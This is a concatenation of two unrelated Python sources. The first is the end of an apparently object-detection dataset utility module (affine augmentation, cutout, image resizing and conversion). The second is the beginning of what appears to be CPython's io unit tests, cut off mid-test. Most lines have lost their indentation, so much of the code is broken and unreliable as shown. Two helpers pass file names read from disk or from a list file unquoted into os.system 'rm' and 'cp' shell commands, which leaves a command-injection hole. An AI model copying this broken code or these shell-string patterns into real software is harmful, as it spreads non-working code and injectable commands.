# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
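# Illustrative sanity check (not from the original file): with all magnitudes at zero and
# no border, M = S @ T @ R collapses to the identity, so random_affine() leaves both the
# image and the [cls, x1, y1, x2, y2] boxes untouched.
def _example_random_affine_identity():
    img = np.zeros((64, 64, 3), dtype=np.uint8)
    targets = np.array([[0, 10.0, 10.0, 30.0, 30.0]], dtype=np.float32)
    out_img, out_targets = random_affine(img, targets, degrees=0, translate=0, scale=0, shear=0)
    return out_img.shape, out_targets  # image unchanged, box preserved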
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.2): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
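# Worked example (illustrative, not from the original file): a 40x40 box squashed by the
# affine warp to 30x5 passes the width/height (>2 px) and aspect-ratio (<20) checks but
# fails the area check (150 / 1600 ~= 0.09 < 0.2), so it is rejected.
def _example_box_candidates():
    box1 = np.array([[0.0], [0.0], [40.0], [40.0]])  # before augmentation, shape (4, n)
    box2 = np.array([[0.0], [0.0], [30.0], [5.0]])   # after augmentation
    return box_candidates(box1, box2)                # -> array([False])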
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
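# Illustrative sketch (not from the original file): cutout() draws random grey patches
# into the image in place and returns only the labels whose boxes are not heavily
# (>60%) covered by one of the larger masks.
def _example_cutout():
    img = np.zeros((256, 256, 3), dtype=np.uint8)
    labels = np.array([[0, 50.0, 50.0, 120.0, 120.0]], dtype=np.float32)  # [cls, x1, y1, x2, y2]
    kept = cutout(img, labels)
    return int(img.max()), len(kept)  # patches written (values in 64..191); 0 or 1 labels kept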
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
        except Exception:
            print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
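# Illustrative sketch (not part of the original test file) of the pattern described in the
# header note: a mixin refers to the implementation under test through class attributes,
# and thin subclasses bind those attributes to the C (io) and pure-Python (_pyio) modules.
class _ExampleRoundTripMixin:
    def test_roundtrip(self):
        buf = self.BytesIO()   # resolved on the concrete subclass
        buf.write(b"abc")
        self.assertEqual(buf.getvalue(), b"abc")
class _CExampleRoundTripTest(_ExampleRoundTripMixin, unittest.TestCase):
    BytesIO = io.BytesIO       # C implementation
class _PyExampleRoundTripTest(_ExampleRoundTripMixin, unittest.TestCase):
    BytesIO = pyio.BytesIO     # pure-Python implementation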
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
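# Illustrative sketch (not part of the original test file): because the mocks above omit
# read(), calling read() goes through the default RawIOBase.read(), which allocates a
# buffer and delegates to readinto() -- the behaviour test_RawIOBase_read() verifies below.
def _demo_default_read_uses_readinto():
    raw = CMockRawIOWithoutRead((b"hello",))
    chunk = raw.read(2)        # served by readinto() under the hood
    return chunk, raw._reads   # -> (b'he', 1)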
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = bytearray(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(data, b" worl")
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(bytearray(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(bytearray()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
self.assertRaises(ValueError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
        # On Windows and Mac OS X this test consumes large resources; it takes
        # a long time to build the >2GB file and takes >2GB of disk space,
        # therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin' or sys.platform == 'uwp':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
